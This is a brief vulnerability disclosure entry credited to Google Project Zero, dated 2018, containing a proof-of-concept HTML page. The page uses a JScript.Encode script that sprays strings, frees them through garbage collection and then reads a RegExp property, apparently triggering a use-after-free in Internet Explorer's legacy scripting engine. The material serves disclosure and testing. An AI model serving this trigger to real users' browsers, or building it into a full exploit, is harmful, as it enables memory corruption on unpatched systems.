- Report: Jun 2018
- Fix: Aug 2018
- Credit: ifratric of Google Project Zero
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
alert('start');
var vars = [];
var r = new RegExp();
for(var i=0; i<20000; i++) {
vars[i] = "aaaaa";
}
r.lastIndex = "aaaaa";
for(var i=20000; i<40000; i++) {
vars[i] = "aaaaa";
}
vars.length = 0;
CollectGarbage();
alert(r.lastIndex);
alert('failed');
</script>